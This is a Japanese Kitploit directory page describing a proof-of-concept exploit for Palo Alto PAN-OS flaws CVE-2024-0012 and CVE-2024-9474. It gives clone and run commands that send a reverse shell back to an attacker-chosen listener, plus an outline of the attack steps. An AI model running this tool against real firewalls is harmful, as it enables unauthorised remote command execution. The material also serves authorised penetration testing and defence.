Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-0012_CVE-2024-9474_PoC — このPoCは、Palo Alto PAN-OSの脆弱性、具体的にはCVE-2024-0012およびCVE-2024-9474を対象としています。このスクリプトは、ペイロードの作成、チャンク転送、シームレスなコマンド実行を含む、エクスプロイトプロセスを自動化します。 | Kitploit
ツール/GitHubGitHub/talatumlabs/cve-2024-0012_cve-2024-9474_poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubtalatumlabs/cve-2024-0012_cve-2024-9474_poc

CVE-2024-0012_CVE-2024-9474_PoC

このPoCは、Palo Alto PAN-OSの脆弱性、具体的にはCVE-2024-0012およびCVE-2024-9474を対象としています。このスクリプトは、ペイロードの作成、チャンク転送、シームレスなコマンド実行を含む、エクスプロイトプロセスを自動化します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
851年前未レビュー

🚀 CVE-2024-0012 & CVE-2024-9474 (Palo Alto PAN-OS) エクスプロイト 🔐

Palo Alto PAN-OS Exploit Type

🛡️ 説明

このProof-of-Concept(PoC)スクリプトは、Palo Alto PAN-OSの脆弱性、具体的には CVE-2024-0012 と CVE-2024-9474 を標的とし、認証バイパス、ペイロード生成、チャンク配信、シームレスなコマンド実行を含むエクスプロイトプロセスを自動化します。

⚠️ このスクリプトは教育目的および許可されたペネトレーションテスト専用です。不正使用は違法です。


🔍 対象となる脆弱性

CVE-2024-0012

  • タイプ: 認証バイパス
  • 影響: 管理インターフェースへの不正アクセスを可能にします。
  • 深刻度: 🚨 緊急

CVE-2024-9474

  • タイプ: コマンド実行と権限昇格
  • 影響: リモートの攻撃者が任意のコマンドを実行できるようにします。
  • 深刻度: 🔥 中

🧑‍💻 使用方法

🛠️ リポジトリをクローン

root@kitploit:~
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC

🚀 スクリプトを実行

root@kitploit:~
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>

引数:

  • <TARGET_URL>: http または https を含むターゲットURL。
  • <LISTENER_IP>: リバースシェルリスナーのIPアドレス。
  • <LISTENER_PORT>: リバースシェルリスナーのポート。

💡 例

root@kitploit:~
python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444

💻 エクスプロイトデモ

https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5


⚙️ 動作の仕組み

このPoCの詳細な解説と技術的洞察については、こちらの Mediumの解説記事 をご覧ください!

  1. 🔍 脆弱性の確認: ターゲットがCVE-2024-0012およびCVE-2024-9474に対して脆弱であることを確認します。
  2. 🛡️ PHPSESSIDの抽出: さらなる悪用のためにセッションIDを取得します。
  3. ✨ ペイロードの生成: 二重エンコードされたリバースシェルペイロードを作成します。
  4. 📦 チャンクのアップロード: ペイロードのチャンクをターゲットサーバーに送信します。
  5. 🔗 ペイロードの結合: ターゲットシステム上でペイロードを再構築します。
  6. ⚡ コマンドの実行: リバースシェルをデコードして実行します。

⚠️ 法的免責事項

このPoCは、教育目的および許可されたセキュリティテスト専用です。このツールの不正使用は固く禁止されています。著者は、このツールの誤用または損害について一切の責任を負いません。


🧑‍🎓 著者

ghostxploiter

ツールをダウンロード